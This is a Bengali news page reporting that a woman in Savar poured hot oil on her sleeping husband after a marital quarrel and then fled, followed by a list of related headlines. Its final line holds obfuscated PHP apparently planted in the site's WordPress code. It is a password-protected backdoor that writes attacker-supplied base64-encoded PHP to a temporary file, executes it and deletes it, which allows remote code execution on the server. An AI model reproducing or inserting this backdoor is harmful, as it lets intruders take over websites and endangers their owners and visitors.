বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

ঘুমন্ত স্বামীকে গরম তেলে ঝলছে দিল স্ত্রী

 

নিজস্ব প্রতিবেদক : দাম্পত্য কলহের জের ধরে সাভারে ঘুমন্ত স্বামীকে গরম তেল দিয়ে ঝলছে দিয়েছে স্ত্রী। বৃহস্পতিবার রাতে সাভার উপজেলার তালবাগ এলাকায় এ ঘটনা ঘটে।খবর পেয়ে সাভার মডেল থানা পুলিশ ঘটনাস্থল পরিদর্শন করেছে। গ্রেফতার আতঙ্কে ঘটনার পরেই গা ঢাকা দিয়েছে অভিযুক্ত স্ত্রী আসমা আক্তার।

66

 

আহতের পারিবারিক সূত্রে জানা গেছে, দাম্পত্য কলহের জের ধরে গত কয়েকদিন ধরে নিয়মিত ঝগড়া হতো ইউসুফ জামিল(বাবু) ও তার স্ত্রী আসমা আক্তারের মধ্যে। বৃহস্পতিবার দিবাগত রাতে নিজ ঘরে জামিল ঘুমিয়ে পড়লে আসমা কড়াইয়ে তেল গরম করে তার স্বামীর মুখে ও শরীরের বিভিন্ন স্থানে ঢেলে দেয়। মুহূর্তে তার মুখমন্ডলসহ শরীরের বিভিন্ন অংশ ঝলসে যায়। জামিলের চিৎকারে প্রতিবেশীরা ঘরে গিয়ে মুমূর্ষূ অবস্থায় তাকে উদ্ধার করে চিকিৎসার জন্য সাভারের এনাম মেডিকেল কলেজ হাসপাতালে ভর্তি করে। ঘটনার পর থেকে স্ত্রী আসমা পলাতক রয়েছে। অবস্থা আশঙ্কাজনক হওয়ায় জামিলকে ঢাকা মেডিকেল কলেজ হাসপাতালে পাঠানোর প্রক্রিয়া চলছে।

 

 

খবর পেয়ে সাভার মডেল থানা পুলিশ ঘটনাস্থল পরিদর্শন করেছে। এ বিষয়ে সাভার মডেল থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) এস এম কামরুজ্জামান বলেছেন, তদন্ত করে ওই নারীর বিরুদ্ধে ব্যবস্থা নেওয়া হবে।আহত ওই যুবক সাভারে স্যানিটারি কন্ট্রাকটার হিসেবে কাজ করতেন। ওই দম্পতির আশরাফুল ইসলাম নামের সাত বছরের একটি ছেলে সন্তান রয়েছে।এ ঘটনায় সাভার মডেল থানায় একটি মামলা দায়েরের প্রস্তুতি চলছে।অন্যদিকে পারিবারিক বিরোধের জের ধরে সাভারের হেমায়েতপুরের পাশ্ববর্তী সিংগাইর এলাকায় এক নারীকে কুপিয়ে আহত করেছে প্রতিপক্ষ। পরে তাকে উদ্ধার করে এনাম মেডিকেল হাসপাতালে ভর্তি করা হয়েছে।

এ জাতীয় আরও খবর

সুনামগঞ্জে বন্যা পরিস্থিতির আরও অবনতির শঙ্কা

পিয়ংইয়ং পৌঁছেছেন রুশ প্রেসিডেন্ট পুতিন

নতুন সময়সূচি চালু : আজ থেকে ব‌্যাংক লেনদেন ১০-৪টা, অফিস চলবে ৬টা পর্যন্ত

তীব্র তাপপ্রবাহের মধ্যে এ বছর ৫৫০ হজযাত্রীর মৃত্যু

ব্রাহ্মণবাড়িয়ায় তিনহাজার টাকা পাওনা নিয়ে হাতাহাতি, বৃদ্ধের মৃত্যু

বছরের সবচেয়ে দামি নায়িকা দীপিকা

বুবলির নাম মুখে নিতে ‘ঘেন্না’ লাগে অপুর

তুফান সিনেমা দেখতে গিয়ে হল ভাঙচুর করলো দর্শকেরা

পতন ঘটতে পারে সরকারের, মোদির জোটের লোকজন যোগাযোগ করছেন : রাহুল

জীবিকার তাগিদ ঘরে ফিরতে দেয়নি তাদের

ঝলসে যাওয়া তাপমাত্রায় পুড়ছেন হজযাত্রীরা, বাড়ছে হতাহত

কবি অসীম সাহা আর নেই

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}